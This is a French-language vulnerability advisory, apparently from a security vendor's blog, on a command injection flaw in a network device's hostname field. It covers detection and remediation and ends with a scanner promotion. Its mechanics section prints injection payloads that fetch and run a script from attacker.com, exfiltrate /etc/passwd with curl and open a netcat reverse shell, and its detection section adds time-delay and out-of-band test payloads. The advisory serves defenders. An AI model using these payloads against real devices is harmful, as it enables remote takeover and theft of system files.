CVE-2025-64090 : une injection de commandes via le champ nom d'hôte de l'appareil permet une compromission complète du système
Des attaquants authentifiés peuvent exécuter des commandes OS arbitraires en injectant des métacaractères shell dans le champ nom d'hôte de l'appareil. CVSS 10.0. Une classe de vulnérabilité courante dans les appareils réseau et systèmes embarqués qui produit systématiquement un impact critique.
| Champ | Détail |
|---|---|
| ID CVE | CVE-2025-64090 |
| Gravité | CRITIQUE (CVSS 3.1 : 10.0) |
| Type de vulnérabilité | Injection de commandes OS (CWE-78) |
| Publié le | 9 janvier 2026 |
| Authentification requise | Oui (faible privilège) |
| Vecteur d'attaque | Réseau |
Qu'est-ce que CVE-2025-64090 ?
CVE-2025-64090 est une vulnérabilité d'injection de commandes où le champ de configuration du nom d'hôte de l'appareil est transmis sans nettoyage à une commande shell sous-jacente. En insérant des métacaractères shell (;, |, `, $()) dans la valeur du nom d'hôte, des attaquants authentifiés peuvent s'échapper du contexte de commande prévu et exécuter des commandes OS arbitraires avec les privilèges du processus de gestion de l'appareil — typiquement root.
Cette classe de vulnérabilité est endémique dans les appareils réseau, le matériel IoT, les routeurs, les pare-feux et les systèmes Linux embarqués où les interfaces de gestion web construisent des commandes shell à partir de valeurs de configuration fournies par l'utilisateur sans nettoyage approprié.
⚠ Faible barrière vers une compromission complète
Tout utilisateur authentifié — y compris les comptes à faible privilège — peut obtenir une exécution de commandes au niveau root. Dans les environnements où des identifiants par défaut ou faibles existent, cela devient effectivement une exploitation non authentifiée.
Mécanique de l'injection de commandes
# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)
# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`
# Subshell:
$(id > /var/www/html/pwned.txt)
# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh
Versions concernées
Consultez l'avis du fournisseur pour connaître les modèles matériels et versions de firmware spécifiques. Les appareils réseau dotés d'interfaces de gestion web exposant la configuration du nom d'hôte constituent la principale surface de risque.
Méthodes de détection
Test d'injection via le nom d'hôte
# Manual test: submit hostname with command injection payload # Use time-delay to confirm blind injection POST /admin/network/hostname hostname=test%3Bsleep%205 # If response delays ~5 seconds: vulnerable # Out-of-band confirmation: hostname=test%3Bnslookup+attacker.burpcollaborator.net
🔍 Détection KENSAI : Le scanner de sécurité des appareils de KENSAI teste les champs de l'interface de gestion, y compris le nom d'hôte, le DNS, le NTP et la configuration SNMP, pour l'injection de commandes OS. Les motifs de CVE-2025-64090 sont inclus dans les profils d'évaluation des appareils réseau.
Étapes de remédiation
- Appliquer la mise à jour du firmware du fournisseur immédiatement.
- Validation des entrées : Les champs de nom d'hôte ne devraient accepter que des caractères alphanumériques et des traits d'union (conformes RFC 952/1123).
- Utiliser des API sûres : Remplacez la construction de commandes shell par des appels système acceptant des tableaux d'arguments (sans interpolation shell).
- Restreindre l'interface de gestion : Limitez l'accès à l'interface de gestion aux plages IP de confiance via des règles de pare-feu.
- Changer les identifiants par défaut : Assurez-vous que tous les comptes de gestion utilisent des mots de passe forts et uniques.
- Segmentation réseau : Isolez les interfaces de gestion des réseaux accessibles aux utilisateurs.
De l'injection de commandes dans vos appareils réseau ?
KENSAI analyse les appareils réseau et les interfaces de gestion à la recherche de vulnérabilités d'injection de commandes, y compris CVE-2025-64090. Identifiez les appareils vulnérables avant que les attaquants n'obtiennent un point d'ancrage.
Analysez gratuitement vos appareils réseauPublié par l'équipe de recherche en sécurité KENSAI · Plus d'analyses de CVE